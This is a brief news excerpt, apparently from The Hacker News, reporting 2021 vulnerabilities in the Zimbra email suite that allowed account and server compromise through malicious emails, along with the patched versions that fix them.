Cybersecurity researchers have discovered multiple security vulnerabilities in Zimbra email collaboration software. The flaws could be potentially exploited to compromise email accounts by sending a malicious message and even achieve a full takeover of the mail server when hosted on a cloud infrastructure. Mitigations have since been released in versions 8.8.15 Patch 23 and 9.0.0 Patch 16.0. The problem stems from the fact that the Zimra web clients an Ajax-based desktop client, a static HTML client, and a mobile-optimized client perform the sanitization of the HTML content of incoming emails on the server-side.
Source: https://thehackernews.com/2021/07/new-bug-could-let-attackers-hijack.html